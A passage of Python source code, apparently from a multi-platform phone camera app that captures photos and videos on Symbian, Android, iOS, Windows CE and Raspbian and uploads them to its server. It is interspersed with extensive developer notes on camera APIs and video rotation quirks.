        # SleepAndPetWatchdog(5.0, False)
        DebugPrint("TakePhotoAndUpload_WinCE(%d): photoFileName = %s, " \
            "photoPathFileNameWithBackslashes = %s, " \
            "OUTPUT_PHOTO_PATH_FILENAMEWithBackslashes = %s." \
            % (cameraId, photoFileName,
            photoPathFileNameWithBackslashes,
            OUTPUT_PHOTO_PATH_FILENAMEWithBackslashes))
        # Upload straight from the tool's fixed output location; renaming
        # or copying it first has historically failed on this platform.
        res = UploadStateAndFileAndStoreState(deviceId, cameraId,
            photoFileName, OUTPUT_PHOTO_PATH_FILENAMEWithBackslashes,
            ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
            singleThreaded=True)
    except:
        DebugPrintErrorTrace()
    return (photoFileName, photoPathFileName)
# Full path of the most recent photo produced by the iOS takePicture loop;
# read by TakePhotoAndUpload_iOS(), which bails out while it is still None.
lastiOSTakePicturePhotoPathFileName = None
def TakePhotoAndUpload_iOS(cameraId, photoFileName, \
        photoPathFileName):
    """
    iOS: upload the most recent photo captured by the takePicture loop.

    Unlike the other platform variants, this does not capture a photo
    itself: the iOS capture code stores the path of the last photo in the
    module-level lastiOSTakePicturePhotoPathFileName, and this function
    uploads that file via UploadStateAndFileAndStoreState().

    cameraId -- camera index, forwarded to the upload call.
    photoFileName, photoPathFileName -- caller-proposed name/path; both
        are replaced by the names derived from the last captured photo
        when one is available.

    Returns the (photoFileName, photoPathFileName) pair actually used, so
    the caller can keep its bookkeeping in sync.  Errors are swallowed
    and traced, mirroring the other platform variants.
    """
    # (Historical research notes on the unofficial iOS camera APIs --
    # PhotoLibrary framework, UIImagePickerController, AVFoundation --
    # were trimmed from this body; see the project history for the links.)
    #!!!! Use lock/mutex to synchronize with the takePicture "loop".
    try:
        if lastiOSTakePicturePhotoPathFileName is None:
            DebugPrint("TakePhotoAndUpload_iOS(%d): " \
                "lastiOSTakePicturePhotoPathFileName is None " \
                "--> bailing out." % cameraId)
            # BUGFIX: was a bare ``return`` (i.e. None); the caller unpacks
            # the result into two variables, which raised
            # "TypeError: 'NoneType' object is not iterable" whenever no
            # photo had been captured yet.  Return the unmodified pair
            # instead, matching this function's other exits.
            return (photoFileName, photoPathFileName)
        photoPathFileName = lastiOSTakePicturePhotoPathFileName
        photoFileName = os.path.basename(photoPathFileName)
        res = UploadStateAndFileAndStoreState(deviceId, cameraId,
            photoFileName, photoPathFileName,
            ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
            singleThreaded=True
            )
    except:
        DebugPrintErrorTrace()
    return (photoFileName, photoPathFileName)
def TakePhotoAndUpload_Android(cameraId, photoFileName, \
        photoPathFileName):
    """
    Android: capture one photo through the SL4A facade and upload it.

    cameraId -- camera index, forwarded to the upload call.
    photoFileName, photoPathFileName -- name and full path the captured
        photo is saved under and uploaded from.

    Returns None.  Failures are traced via DebugPrintErrorTrace().
    """
    DebugPrint("TakePhotoAndUpload_Android(%d): photoFileName = %s, " \
        "photoPathFileName = %s." % \
        (cameraId, photoFileName, photoPathFileName))
    try:
        #!!!!TODO: I can use here MobileWebCam, as well
        # Legacy toggle: when enabled, pick up photos produced by the
        # external ruby helper script instead of capturing one ourselves.
        useRubyScriptICamTest = False
        if not useRubyScriptICamTest:
            try:
                # cameraCapturePicture() briefly brings up the viewfinder
                # and then returns to the previous view; while it is up the
                # UI submenu is unavailable.
                myDroid.cameraCapturePicture(photoPathFileName)
                # Allow time for the photo to reach the disk.
                SleepAndPetWatchdog(5.0, False)
                res = UploadStateAndFileAndStoreState(deviceId, cameraId,
                    photoFileName, photoPathFileName,
                    ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
                    singleThreaded=True
                    )
            except:
                DebugPrintErrorTrace()
        else:
            # Photos made with the ruby script iCamTest.rb .
            #!!!!TODO: update photoFileName and photoPathFileName and return them to the caller
            latestPhoto = GetLatestPhoto(".jpg")
            if latestPhoto is not None:
                res = UploadStateAndFileAndStoreState(deviceId, cameraId,
                    latestPhoto[0], latestPhoto[1],
                    ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
                    singleThreaded=True
                    )
    except:
        DebugPrintErrorTrace()
if RASPBIAN_OS:
    # subprocess is only imported on the Raspbian build, where it is used
    # below to drive the fswebcam command-line capture tool.
    import subprocess
def TakePhotoAndUpload_Raspbian(cameraId, photoFileName, \
        photoPathFileName):
    """
    Raspbian: capture one webcam photo with fswebcam and upload it.

    cameraId -- camera index; currently ignored for capture (/dev/video0
        is hard-coded below, see the TODO) but forwarded to the upload.
    photoFileName -- bare file name for the photo.
    photoPathFileName -- proposed path; replaced by a per-day media
        subfolder path (YYYY_MM_DD) before capturing.

    Returns None.  Failures are traced via DebugPrintErrorTrace().
    """
    DebugPrint("TakePhotoAndUpload_Raspbian(%d): photoFileName = %s, " \
        "photoPathFileName = %s." % \
        (cameraId, photoFileName, photoPathFileName))
    if True:
        # We put the photo in a different folder for each day
        try:
            crtLOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER_MEDIA_FILES + "/" + \
                time.strftime("%Y_%m_%d", GetCurrentDateTime())
            if not os.path.exists(crtLOCAL_FOLDER_MEDIA_FILES):
                os.makedirs(crtLOCAL_FOLDER_MEDIA_FILES)
            photoPathFileName = crtLOCAL_FOLDER_MEDIA_FILES + "/" + \
                photoFileName
        except:
            DebugPrintErrorTrace()
    try:
        #!!!!TODO: use cameraId
        myId = 0
        #CAM_TL = "fswebcam -d /dev/video%d -r 320x240 --no-timestamp --no-banner" % myId
        CAM_TL = "fswebcam -d /dev/video%d -r 320x240" % myId
        #fileNameTstamp = "TL" + timestampAlex() + ("_%05d.jpg" % index)
        cmd = CAM_TL + " " + photoPathFileName #fileNameTstamp
        try:
            #print("Run:" + cmd)
            # NOTE(review): shell=True with a command string that embeds
            # photoPathFileName; acceptable for these internally generated
            # names, but unsafe if the path ever came from external input.
            subprocess.call([cmd], shell=True)
        except:
            DebugPrintErrorTrace()
        # Wait a bit to make sure the photo gets saved.
        # time.sleep(5.0)
        SleepAndPetWatchdog(5.0, False)
        res = UploadStateAndFileAndStoreState(deviceId, cameraId,
            photoFileName, photoPathFileName,
            ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
            singleThreaded=True
            )
    except:
        DebugPrintErrorTrace()
"""
!!!!TODO: The code is stuffy with all the platforms - maybe split it.
But do not bother to reorganize it much otherwise (for example, it
is rather OK the fact each OS platform call its own
UploadStateAndFileAndStoreState()
Take photo at specified resolution, save it and scale it to the desired
resolution and send it.
"""
def TakePhotoAndUpload(cameraId):
    """Take one photo with camera cameraId and upload it to the server.

    Builds a timestamped file name, chooses the local path depending on the
    OS platform and storeLocallyMedia, dispatches to the per-platform
    TakePhotoAndUpload_*() helper, and deletes the local file afterwards
    when storeLocallyMedia == 0.
    """
    global photoModeStr, localPhotoResolution
    global deviceId
    global photoModeIndex
    GetGSMLocation()
    # t = datetime.datetime.now()
    """
    See http://pleac.sourceforge.net/pleac_python/datesandtimes.html and
        http://docs.python.org/library/time.html#time.strftime for details.
    """
    # photoFileName = t.strftime("%Y_%m_%d_%H_%M_%S.jpg")
    """
    crtTime = GetCurrentDateTime()
    photoFileName = time.strftime("%Y_%m_%d_%H_%M_%S", crtTime) + \
                        ("_%d.png" % cameraId)
    # RGB24
    photoModeIndex[0] = 2
    """
    photoFileName = GetCurrentDateTimeStringWithMilliseconds() + \
                        "_%s_%d.jpg" % (deviceId, cameraId)
                        #"_%d.jpg" % cameraId
    """
    photoFileName = time.strftime("%Y_%m_%d_%H_%M_%S", crtTime) + \
                        ("_%d.jpg" % cameraId)
    """
    if storeLocallyMedia == 0:
        if ANDROID_OS:
            photoPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + photoFileName
        elif SYMBIAN_OS:
            """
            Since we don't want to store the file, we save it in the RAM
                drive.
            # photoPathFileName = "D:/iCamTemp.jpg"
            """
            photoPathFileName = LOCAL_FOLDER_TEMP + "/iCamTemp.jpg"
        elif WINDOWS_CE_OS_PYTHONCE:
            photoPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + photoFileName
        else:
            photoPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + photoFileName
    else:
        # BUGFIX: photoPathFileName used to be left undefined when
        # storeLocallyMedia != 0, raising a NameError in the DebugPrint
        # below. Mirror the corresponding else branch of
        # VideoRecordAndUpload().
        photoPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + photoFileName
    myText = "TakePhotoAndUpload(%d) with photoPathFileName = %s: " \
                "localPhotoResolution[cameraId] = %s, " \
                "photoMode[cameraId] = %s. " % \
                (cameraId, photoPathFileName,
                 str(localPhotoResolution[cameraId]),
                 photoModeStr[photoModeIndex[cameraId]][1])
    myText += GetTextForState(cameraId)
    DebugPrint(myText)
    # Dispatch to the platform-specific capture + upload implementation.
    if ANDROID_OS:
        TakePhotoAndUpload_Android(cameraId, photoFileName, photoPathFileName)
    elif SYMBIAN_S60_OS:
        # elif SYMBIAN_OS:
        TakePhotoAndUpload_S60(cameraId, photoFileName, photoPathFileName)
    elif iOS_PYOBJC:
        photoFileName, photoPathFileName = TakePhotoAndUpload_iOS(cameraId, \
                                            photoFileName, photoPathFileName)
    elif WINDOWS_CE_OS_PYTHONCE:
        photoFileName, photoPathFileName = TakePhotoAndUpload_WinCE(cameraId, \
                                            photoFileName, photoPathFileName)
    elif RASPBIAN_OS:
        TakePhotoAndUpload_Raspbian(cameraId, photoFileName, photoPathFileName)
    if storeLocallyMedia == 0:
        if ANDROID_OS:
            DebugPrint("Since storeLocallyMedia == 0, now I SHOULD erase it.")
        elif SYMBIAN_OS:
            DebugPrint("Since storeLocallyMedia == 0, I saved the photo on " \
                        "D: and now I erase it.")
        try:
            if SYMBIAN_OS:
                if _PyS60_1_9_OR_NEWER: #pyS60VersionNumber > 14:
                    # Wait until the upload thread is done with the file
                    # before deleting it.
                    mediaUploadedLock.wait()
            os.unlink(photoPathFileName)
        except:
            DebugPrintErrorTrace()
if SYMBIAN_OS:
    # Active-object lock: the S60 video-recording code blocks on this until
    # the camera callback signals that recording preparation is complete.
    videoLock = e32.Ao_lock()
def VideoRecordCallback(errorCode, eventType):
    """Callback invoked by the PyS60 camera module during video recording.

    errorCode - Symbian error code (negative on failure).
    eventType - camera event constant; on camera.EPrepareComplete we stamp
        the recording start time and signal videoLock so the recording code
        can proceed.
    """
    if SYMBIAN_OS:
        """
        IMPORTANT: From
            http://library.forum.nokia.com/index.jsp?topic=/S60_5th_Edition_Cpp_Developers_Library/GUID-35228542-8C95-4849-A73F-2B4F082F0C44/sdk/doc_source/reference/reference-cpp/Multimedia_Framework/CVideoRecorderUtilityClass.html
            CVideoRecorderUtility::Stop() (invoked by camera.stop_record()):
                "Recording is stopped without sending the MvruoRecordComplete
                message to the client."
        ERecordComplete is not given by camera.stop_record()
        Only time given when video recording was stopped probably by brutal
            exit from app:
            Exiting iCam at 11:47:58 09-03-2011 - command given from the
                cellphone.
            ContinuousVideoRecordAndUpload()::VideoCallback(): at
                2011_03_09_11_48_13_190 we have errorCode = -18,
                statusInfo = 4002.
            Entered PetWatchdog() at 11:48:13 09-03-2011.
        """
        """
        global control_light # what does this represent?!!!!
        if statusInfo == camera.EPrepareComplete:
            control_light = 1
        """
        """
        //cameramodule.cpp
        // A helper function for the implementation of callbacks
        //from C/C++ code to Python callables (modified from appuifwmodule.cpp)
        TInt TPyVidCallback::VideoCameraEvent(TInt aError, TInt aStatus)
          {
          PyGILState_STATE gstate = PyGILState_Ensure();
          TInt error = KErrNone;
          PyObject* arg = Py_BuildValue("(ii)", aError, aStatus);
          ...
          }
        //MvruoEvent defined in
        //C:\Symbian\9.2\S60_3rd_FP1\Epoc32\include\videorecorder.h
        //and in http://library.forum.nokia.com/index.jsp?topic=/S60_5th_Edition_Cpp_Developers_Library/GUID-35228542-8C95-4849-A73F-2B4F082F0C44/sdk/doc_source/reference/reference-cpp/Multimedia_Framework/MVideoRecorderUtilityObserverClass.html
        //TMMFEvent defined in
        //C:\Symbian\9.2\S60_3rd_FP1\Epoc32\include\mmf\common\mmfcontrollerframeworkbase.h:
        //and in http://library.forum.nokia.com/index.jsp?topic=/S60_5th_Edition_Cpp_Developers_Library/GUID-35228542-8C95-4849-A73F-2B4F082F0C44/sdk/doc_source/reference/reference-cpp/Multimedia_Framework/TMMFEventClass.html
        //See also "Symbian OS C++ for Mobile Phones", Volume 2, page 291:
            "Synchronous or asynchronous communication of custom commands
            to the video controller is supported in the same way as for the
            video player utility. Custom callbacks are also supported by the
            observer's MvruoEvent() function. Again, as in the video player,
            this function's usage is not defined by the video player utility
            and thus a video controller supplier may use it to return
            manufacturer-specific information. The event is returned as a
            TMMFEvent, which contains a UID specifying an event type and an
            error code."
        //takephoto.cpp:
        void CVideoCamera::MvruoEvent(const TMMFEvent &aEvent) {
            // XXX modify the callback as there are not enough parameters
            // this will not show properly to the Python layer
            if(iCallbackSet)
                iCallMe.VideoCameraEvent(aEvent.iErrorCode, aEvent.iEventType.iUid);
            }
        void CVideoCamera::MvruoOpenComplete(TInt aError) {
            iCallMe.VideoCameraEvent(aError, CVideoCamera::EOpenComplete);
            ...
            }
        void CVideoCamera::MvruoPrepareComplete(TInt aError) {
            iCallMe.VideoCameraEvent(aError, CVideoCamera::EPrepareComplete);
            ...
            }
        void CVideoCamera::MvruoRecordComplete(TInt aError) {
            iCallMe.VideoCameraEvent(aError, CVideoCamera::ERecordComplete);
            }
        //cameramodule.h
        enum TObserverEvents
            {
            EOpenComplete = 0xFA0,
            EPrepareComplete,
            ERecordComplete
            };
        and camera.py:
            EOpenComplete=_camera.EOpenComplete
            EPrepareComplete=_camera.EPrepareComplete
            ERecordComplete=_camera.ERecordComplete
        """
        DebugPrint("VideoRecordCallback(): at %s we have errorCode = %d, " \
                    "eventType = %d." % \
                    (GetCurrentDateTimeStringWithMilliseconds(),
                     errorCode, eventType))
        """
        This callback gets invoked first with eventType = camera.EOpenComplete,
            after 145-360ms after start_record().
        Finished prepare for video recording, now ready to record (I guess this
            is equivalent to the red light turning on at least on N95 and N82).
        """
        if eventType == camera.EPrepareComplete:
            global videoRecordStartTime, numFrames
            # GetCurrentDateTimeStringWithMilliseconds()
            videoRecordStartTime = GetTime()
            numFrames = 0
            # Unblock VideoRecordAndUpload_S60(), which waits on this lock.
            videoLock.signal()
def SetViewFinderSizeForVideoRecording(cameraId):
    """Update the global viewFinderSize to suit video recording.

    The size is chosen from the requested recording width
    (localVideoMode[cameraId][0][0]) and the Symbian platform flags.
    """
    global viewFinderSize, localVideoMode
    global deviceId
    requestedWidth = localVideoMode[cameraId][0][0]
    if requestedWidth >= 320:
        # viewFinderSize = (320, 240)
        if SYMBIAN_S60_2ND_ED:
            # We should not get here, since the max video resolution on
            # S60 2nd edition is 176x144.
            chosenSize = (176, 144)
        elif SYMBIAN_S60_3RD_ED:
            # chosenSize = (245, 200)
            chosenSize = (220, 180)
        else:
            # This is conserving aspect ratio for (320, 240), as for
            # (176, 144).
            chosenSize = (293, 240)
    elif SYMBIAN_3:
        # On my E7, if we use a viewfinder with size 176x144 then when it
        # starts recording some STRANGE green lines appear and the phone
        # might crash...
        # if deviceId == IMEI_E7:
        # This is conserving aspect ratio for (320, 240), as for (176, 144).
        chosenSize = (293, 240)
    else:
        # chosenSize = (320, 240)
        chosenSize = localVideoMode[cameraId][0]
    viewFinderSize = chosenSize
"""
To avoid the movies to be recorded rotated (e.g., you keep the phone in
"landscape" mode and you record with the Main camera and when you look on
    the viewer application you see the movie is rotated by 90 degrees)
YOU HAVE TO specify on your phone to rotate its display along with the
phone. This can be achieved (at least on S60 3rd edition phones) by going
at Tools\Settings\General\Personalization\Display\Rotate screen and
choosing Automatic.
See weekly snippets:
Nov 6, 2010
finally realized that the rotation of videos (on S60 3rd edition) is
caused indeed by the fact iCam is minimized and another app with
portrait orientation is displayed. I have 2 solutions:
* I make sure the other app that is maximized is in landscape orientation
- but what do we do in this case if we take photos/movies with the
Front camera?
o another solution is to lock the orientation in landscape for
all processes (maybe this is useful
http://wiki.forum.nokia.com/index.php/CS001517_-_Lock_application_orientation_in_Qt_for_Symbian ).
* this is the best solution, but hardest I guess: don't maximize the
ReV_Watchdog - it happens because of the console watchdog.
* for photos the situation is even worse: without any orientation
(nor application) changes N82 takes randomly photos well or
rotated. N95 as well
(see Z:\1PhD\ReVival\Logs\NokiaN95\279\Media\):
although I start in landscape mode, camera reports max res of
(1600, 1200), so I tell it to take photos only at this
resolution - first 2 photos are actually taken at 2592x1944 and
then the following are taken rotated at 1600x1200
(the right res).
* also, N95 video records at 176x144 at smaller viewfield than photo
Nov 16, 2010
since I saw yesterday (in src\ext\amaretto\camera\src\cameramodule.cpp,
        at cam_take_photo()) that the camera is re-initialized at every
camera.take_photo(), it implies that starting the viewfinder is not
really the thing required to take photos at max resolution and
angular view. But it is actually the backlight_on parameter set to
True given to start_finder() that makes all the differences - but
in fact this translates just to e32.reset_inactivity(). So we only
need to be in landscape mode (and it is not necessary to have iCam
focused and) give e32.reset_inactivity() before take_photo() to
take photos at max resolution and angular view. This is more
desirable than starting the ViewFinder because: it takes less time,
uses less the shutter, and also has less chances to give
KErrAlreadyExists. Also, the issue is that the Power Manager is
invariably in Portrait mode, so when it kicks in
(for pauseInterval >= 1 min, usually)
"""
def VideoRecordAndUpload_S60_Before(cameraId):
    """Prepare the S60 phone for video recording with camera cameraId.

    Wakes the phone out of the (portrait-only) screen saver, sizes the
    viewfinder for video and starts it. The explicit sleeps/resets below
    are load-bearing - see the comments.
    """
    # if phoneModel in ["Nokia6120", "NokiaN95", "NokiaN82"]:
    if orientationForThisPhoneModel == "landscape":
        isBackLightOn = True
    else:
        isBackLightOn = False
    """
    We have observed on "landscape"-mode-phones that the screen saver
        (which is INVARIABLY in Portrait mode) can mess up the video
        recordings making them rotated (as in Portrait mode). This is why
        we give e32.reset_inactivity() and also e32.ao_sleep(), to make
        sure we get out of the screen saver mode before the viewfinder
        starts (which is used by the recording).
    """
    try:
        """
        !!!!Maybe optimize a bit for the case if (cameraId == 1): - we can
            PROBABLY take into consideration the fact the screen saver is
            in Portrait mode so we don't need this extra
            e32.reset_inactivity() and e32.ao_sleep(). But what if we are
            not in screen saver mode? :))
        """
        e32.reset_inactivity()
        """
        In case the power saver is started we leave a few seconds for S60
            to get out of the screen saver mode - sometimes it takes
            longer.
        """
        e32.ao_sleep(3)
        """
        if (cameraId == 0) and camera2IsImported:
            # IMPORTANT: AT THE END OF THE RECORD WE MAKE
            #   viewFinderSize = VIEWFINDER_SIZE_ORIG - SEE BELOW,
            #   IN FINALLY.
            viewFinderSize = (320, 240) #(293, 240)
        else:
            # IMPORTANT: AT THE END OF THE RECORD WE MAKE
            #   viewFinderSize = VIEWFINDER_SIZE_ORIG - SEE BELOW,
            #   IN FINALLY.
            viewFinderSize = (176, 144) #(293, 240)
        """
        SetViewFinderSizeForVideoRecording(cameraId)
        # StartViewFinderForCamera(cameraId, isBackLightOn, True)
        StartViewFinderForCamera(cameraId, isBackLightOn, False)
        e32.reset_inactivity()
        # When iCam is not the main app, video recs are rotated.
        # e32.ao_sleep(3)
        # Generated 1 rotated out of 16
        # e32.ao_sleep(2)
        e32.ao_yield()
        # e32.ao_sleep(4)
        # e32.ao_sleep(5)
        """
        We have to make sure (for ex on Nokia 6120) that the viewfinder
            is started if we want to get visual info in the video recorded.
        """
        e32.ao_sleep(2)
        e32.reset_inactivity()
    except:
        DebugPrintErrorTrace()
def VideoRecordAndUpload_S60(cameraId, recordDuration, videoFileName, \
                             videoPathFileName):
    """Record one video clip on Symbian S60 and save it locally.

    cameraId - camera index (0 = main camera; uses camera2 features when
        camera2IsImported).
    recordDuration - clip length in seconds (passed to e32.ao_sleep()).
    videoFileName / videoPathFileName - names used for logging and saving.
    On any exception we log, restore viewFinderSize and return.
    """
    global viewFinderSize
    global videoLock
    try:
        """
        Requires backslashes, otherwise camera.start_record() does not
            create any file.
        """
        videoPathFileNameWithBackslashes = \
            videoPathFileName.replace("/", "\\")
        if (cameraId == 0) and camera2IsImported:
            """
            #camera.start_record(videoPathFileNameWithBackslashes,
            #   VideoRecordCallback,
            #   frameSize = localVideoMode[cameraId][0]) #size = (320, 240))
            #camera.start_record(videoPathFileNameWithBackslashes,
            #   VideoRecordCallback, format="YUV420p",
            #   frameSize=localVideoMode[cameraId][0], frameRate=15.0,
            #   videoType="", audioEnabled=videoAudioEnabled)
            #camera.start_record(videoPathFileNameWithBackslashes,
            #   VideoRecordCallback, format="YUV420p",
            #   frameSize=localVideoMode[cameraId][0],
            #   frameRate=localVideoMode[cameraId][1], videoType="",
            #   audioEnabled = videoAudioEnabled)
            # At least on Nokia E7, to be able to record at 320x240, you
            #   need to specify in camera2.start_record() a
            #   videoType="video/mp4v-es; profile-level-id=3" (or 4)
            #   (videoType="" will record at 176x144).
            #camera.start_record(videoPathFileNameWithBackslashes,
            #   VideoRecordCallback, format="YUV420p",
            #   frameSize=localVideoMode[cameraId][0],
            #   frameRate=localVideoMode[cameraId][1],
            #   videoType="video/mp4v-es; profile-level-id=3",
            #   audioEnabled=videoAudioEnabled)
            # Good:
            # This allows recording on N82 320x240x30fps and 640x480x30fps.
            """
            camera.start_record(
                videoPathFileNameWithBackslashes, VideoRecordCallback,
                format="EFormatYUV420Planar",
                frameSize=localVideoMode[cameraId][0],
                frameRate=localVideoMode[cameraId][1],
                videoType="video/mp4v-es; profile-level-id=4",
                audioEnabled=videoAudioEnabled
                )
            # Here we try Night scene mode.
            #camera.start_record(videoPathFileNameWithBackslashes,
            #   VideoRecordCallback, format="EFormatYUV420Planar",
            #   frameSize=localVideoMode[cameraId][0], frameRate=0.0,
            #   videoType="video/mp4v-es; profile-level-id=4",
            #   audioEnabled=videoAudioEnabled)
            """
            # Bypassing checks for size supported, etc:
            # This one doesn't work because size 1280, 720 is reported as
            #   not being supported - so need to bypass the checks:
            # camera.start_record(videoPathFileNameWithBackslashes,
            #   VideoRecordCallback, format="EFormatYUV420Planar",
            #   frameSize=(1280, 720), frameRate=25.0,
            #   videoType="video/H264; profile-level-id=42801F",
            #   audioEnabled=videoAudioEnabled) # bitrate = 5000000 .
            # Maybe try format = "EFormatEncodedH264",
            # I was able to record with this on E7 at 1280x720 at 15 fps -
            #   MAYBE because KMMFVariableVideoBitRate, and AltoRetrato
            #   says that we need to use fixed bitrate (e.g., 5000000)
            #camera._my_video.start_record(camera._handle(),
            #   unicode(videoPathFileNameWithBackslashes),
            #   VideoRecordCallback, (1280, 720),
            #   camera.formatMap["EFormatYUV420Planar"], 25.0,
            #   "video/H264; profile-level-id=42801F", True)
            # I was able to record with this on E7 at 1280x720 at 15 fps -
            #   probably because KMMFVariableVideoBitRate, and AltoRetrato
            #   says that we need to use fixed bitrate (e.g., 5000000).
            camera._my_video.start_record(camera._handle(),
                unicode(videoPathFileNameWithBackslashes),
                VideoRecordCallback, (1280, 720),
                camera.formatMap["EFormatEncodedH264"], 25.0,
                "video/H264; profile-level-id=42801F", True)
            """
        else:
            #camera.start_record(videoPathFileNameWithBackslashes,
            #   VideoRecordCallback, size = (640, 480)) #, fps = 15.0)
            camera.start_record(videoPathFileNameWithBackslashes,
                                VideoRecordCallback)
        """
        Preparing for video record might take, in some cases, even seconds,
            so we wait for notification that it is ready:
        """
        # Blocks until VideoRecordCallback() sees EPrepareComplete.
        videoLock.wait()
        e32.ao_sleep(recordDuration)
        """
        If I use after it might give strange results - can record for
            much longer than wanted (e.g., 1:30 min instead of 15 secs) -
            is it maybe because of the petting that writes a file on D: ?
        #SleepAndPetWatchdog(recordDuration)
        #global myTimer
        #myTimer.after(recordDuration, camera.stop_record)
        """
        """
        This operation takes time: it finishes the compression and saves
            the data on card.
        """
        camera.stop_record()
        # camera.stop_finder()
        global videoRecordStartTime
        videoRecordStartTime = -1
        """
        StopViewFinderForCameraCallable comes after
            videoRecordStartTime = -1 because we need this value to update
            properly the ViewFinder section of the menu.
        """
        # StopViewFinderForCameraCallable(False)
        StopViewFinderForCameraCallable(True)
    except:
        (exceptionType, exceptionValue, exceptionTraceback) = \
            sys.exc_info()
        """
        UploadGZippedData(deviceId, "Exception in " \
                "VideoRecordAndUpload(%d) with videoFileName = %s: " \
                "details: free_ram = %d. %s.\n" \
                % (cameraId, videoFileName, GetFreeRAM(),
                   repr(traceback.format_tb(exceptionTraceback)) ),
                ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
        # traceback.print_exc()
        """
        errorStr = "VideoRecordAndUpload_S60(%d) with videoFileName %s " \
                    "(free_ram = %d) returned exception %s. " \
                    "Bailing out..." % \
                    (cameraId, videoFileName, GetFreeRAM(),
                     repr(traceback.format_tb(exceptionTraceback)))
        if MY_DEBUG_UPLOAD_MSG:
            UploadGZippedData(deviceId, errorStr, ICAM_SERVER_NAME,
                              WEBPAGE_UL_GZIPPED_TEXT, None)
        DebugPrint(errorStr)
        if MY_DEBUG_STDERR:
            sys.stderr.write(" " + errorStr + "\n")
        DebugPrintErrorTrace()
        """
        viewFinderSize = VIEWFINDER_SIZE_ORIG
        # Even if we give return, finally is sill executed before returning
        #   from this function.
        return
        """
    """
    # !!!!This finally doesn't work on PyS60 1.4.5 (Python 2.2) - WHY?!!!!
    finally:
        viewFinderSize = VIEWFINDER_SIZE_ORIG
    """
    # Manual replacement for the finally above (see the note): restore the
    # viewfinder size on both the success and the exception path.
    viewFinderSize = VIEWFINDER_SIZE_ORIG
def VideoRecordAndUpload_WinCE(cameraId, recordDuration, \
                               videoFileName, videoPathFileName):
    """Pick up the most recent video recorded by the external Camera app on
    Windows CE and prepare it for upload.

    Returns (videoFileName, videoPathFileName, actualFileName) - the caller
    uploads the file and possibly moves it to the Sent folder.
    NOTE(review): the early bare "return" below (taken when the newest file
    is not a VIDEO* file) returns None, while the caller unpacks a 3-tuple -
    that would raise a TypeError; confirm whether that path can trigger.
    """
    # if accessPointName == u"":
    #     print "VideoRecordAndUpload(): Not uploading movie."
    #     return
    """
    if os.path.isfile(videoPathFileName):
        os.unlink(videoPathFileName)
    # It takes between 1:30 - 5 minutes on HTC Touch Cruise to encode the
    #   video to .asf ... :)
    WinSpawn(r"\Storage Card\iCam\video_rec_mute_30sec_ASF_and_exit.exe",
             [])
    """
    # Calling the Camera.exe application directly :)
    # Doesn't work
    # WinSpawn(r"\Storage Card\iCam\TimeLapsePhotos.mscr", [])
    # The MortScript (.mscr) doesn't work well when called from iCam.py -
    #   the Sleep() in .mscr works incorrectly (usually sleeps very little
    #   - ~nothing for 30 secs, etc).
    #WinSpawn(r"\Storage Card\iCam\CamAuto.exe", [])
    # Camera.exe application runs in a separate process.
    # Finding the most recent video.
    try:
        actualFileName = None
        pathFolderName = WINCE_MEDIA_FOLDER
        folderContent = os.listdir(pathFolderName)
        """
        Use reverse = False to send first the oldest ones (like this you
            send in chronological order). Use reverse = True for sending
            first the most recent ones.
        """
        # sortedFolderContent = sorted(folderContent, reverse = False)
        """
        sort() without parameters is the ONLY one that works in Python 2.2.
        (Info on sort at http://wiki.python.org/moin/HowTo/Sorting/.)
        """
        folderContent.sort()
        sortedFolderContent = folderContent
        DebugPrint("VideoRecordAndUpload_WinCE(): " \
                    "sortedFolderContent = %s." % sortedFolderContent)
        """
        !!!!I should check for len(sortedFolderContent) > 2
        """
        actualFileName = sortedFolderContent[len(sortedFolderContent) - 1]
        videoPathFileName = pathFolderName + "/" + actualFileName
        try:
            # Probe-open the file to check the Camera app is done with it.
            fInput = open(videoPathFileName, "rb")
            # mediaFileData = fInput.read()
            fInput.close()
        except:
            DebugPrintErrorTrace()
            """
            If I can't open the file I presume it's because the Camera app
                is still recording on this file. So I use the previous
                video recorded.
            """
            actualFileName = \
                sortedFolderContent[len(sortedFolderContent) - 2]
            videoPathFileName = pathFolderName + "/" + actualFileName
        if actualFileName.find("VIDEO") == -1:
            return
        """
        else:
            # !!!!We assume this is the most recent movie - I should check
            #   after creation time.
            videoPathFileName = "/Storage Card/DCIM/100MEDIA/" + \
                                    actualFileName
        for actualFileName in sortedFolderContent:
            if (actualFileName.find(STDERR_FILENAME_PREFIX) != -1) or
                (actualFileName.find(STDOUT_FILENAME_PREFIX) != -1):
        """
        try:
            if MY_DEBUG_STDOUT:
                # See http://docs.python.org/library/os.path.html
                # print "File was last modified (12 hour format):"
                print "VideoRecordAndUpload_WinCE(): File %s has the write " \
                        "(last modification?) time (getmtime) %s." % \
                        (videoPathFileName,
                         time.strftime("%m/%d/%Y %I:%M:%S %p",
                            time.localtime(
                                os.path.getmtime(videoPathFileName))))
                """
                NOT RELEVANT on WinCE - returns correct day, but hour is
                    12:00:00 AM:
                print "VideoRecordAndUpload(): File %s has " \
                        "the last access time (getatime) %s." % \
                        (videoPathFileName, time.strftime(
                            "%m/%d/%Y %I:%M:%S %p",
                            time.localtime(os.path.getatime(
                                videoPathFileName))))
                """
                print "VideoRecordAndUpload_WinCE(): File %s has the " \
                        "creation time (on Windows) (getctime) %s." % \
                        (videoPathFileName,
                         time.strftime("%m/%d/%Y %I:%M:%S %p",
                            time.localtime(os.path.getctime(
                                videoPathFileName))))
                sys.stdout.flush()
        except:
            DebugPrintErrorTrace()
        try:
            """
            Use the modification time of the video and preserve its
                extension (.mp4, .3gp, etc).
            """
            videoEndTime = \
                time.localtime(os.path.getmtime(videoPathFileName))
            """
            See http://pleac.sourceforge.net/pleac_python/datesandtimes.html
                and http://docs.python.org/library/time.html#time.strftime
                for details.
            """
            videoFileName = time.strftime("%Y_%m_%d_%H_%M_%S_000", \
                                videoEndTime) + \
                                "_%s_%d" % (deviceId, cameraId) + \
